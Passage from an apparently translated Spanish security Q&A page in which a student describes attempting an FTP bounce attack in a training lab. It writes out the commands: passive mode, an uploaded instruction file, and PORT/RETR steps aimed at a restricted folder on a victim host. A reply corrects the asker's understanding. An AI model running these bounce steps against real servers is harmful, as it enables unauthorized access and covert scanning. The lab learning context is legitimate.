FTP Bounce ataque, ¿qué pasa?

Navega tus respuestas
1

Estoy estudiando seguridad en un laboratorio de entrenamiento, y estoy tratando de implementar el infame ataque de rebote de FTP.  Usaré un servidor FTP remoto (llamado BOUNCE aquí) para acceder a una carpeta en la máquina VICTIM que está prohibida para mi dirección IP. No sé si la máquina VICTIM permite el acceso a la carpeta prohibida a BOUNCE, pero vale la pena intentarlo :)

Esto es lo que hago:

Comienzo mi propio servidor de ftp puro y me conecto a él: 

service pure-ftpd start

~# ftp My_IP 21
ftp> USER my_own_username

Luego, le digo a mi servidor que entre en modo pasivo, responde con una dirección IP (que es mi propia dirección IP) y un PUERTO con una forma como: (F, F, F, F, X, X) Tomo nota de ello para más adelante. 

ftp> quote "pasv"   
Entering Passive Mode (F,F,F,F,X,X)

Y finalmente, le digo a mi servidor que acepte los datos del canal de datos y los almacene en el archivo foobar , si no existe, el servidor crea uno. 

ftp> quote "stor foobar"

Después de esto, mi servidor (que ahora está en modo pasivo) se bloqueará ...

Ahora voy a usar un servidor vulnerable a FTP-bounce (que encontré gracias a nmap que muestra el mensaje "Ftp-Bounce Working!") que llamaré "Bounce". Si entendí correctamente, este último es capaz de conectarse a otros servidores FTP utilizando el comando PORT. Afortunadamente, puedo conectarme a Bounce de forma anónima y subir algunos archivos con el comando PUT.

A continuación, importaré el siguiente archivo a Bounce: 

user anonymous
pass whatyouwant
cd /restricted-folder
port F,F,F,F,X,X
ls
quit
^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
...

Luego se cargará desde Bounce a la máquina de víctimas para permitir que este último ejecute las instrucciones en.

Hago esto con esos últimos comandos (aún en Bounce): 

put instrs
quote "port C,C,C,C,0,21"
quote "retr instrs"

Donde C,C,C,0,21 es la IP de la máquina víctima (llamémosla VICTIM). (por lo que se conectará en VICTIM, y le dirá que ejecute la instrucción en el archivo de instrucciones, si lo entendí correctamente).

Problema : justo después del comando quote "retr instrs , aparece el siguiente error: 501 Cannot RETR. Error

Entonces, me pregunto, ¿es VICTIM o BOUNCE que impide que el comando RETR también funcione? Dime también, si crees que entendí mal algo. Muchas gracias por su atención.

    
pregunta ahg8tOPk78 17.10.2016 - 16:27
fuente

1 respuesta

0

No has entendido los ataques de FTP Bounce.

Los ataques de FTP Bounce no permiten que un FTP se conecte a otro, sino para solicitar acceso a los puertos mediante el comando PORT. Se utiliza principalmente para realizar una exploración de puertos sin ser detectado (ya que no es usted quien lo hace, sino el servidor FTP para usted), o incluso para D.o.S. ataques.

Activar este rebote de FTP para cargar un archivo de un servidor FTP a otro (como parece que quieres hacer, perdóname si te he entendido mal) requiere mucho más que esto.

El comando PORT puede funcionar, pero no RETR

    
respondido por el KanekiDev 17.10.2016 - 16:41
fuente

Lea otras preguntas en las etiquetas

¿Por qué las curvas binarias del NIST no son tan populares como las curvas primarias del NIST para ECDSA? ¿Previene https el ataque en el medio por el servidor proxy?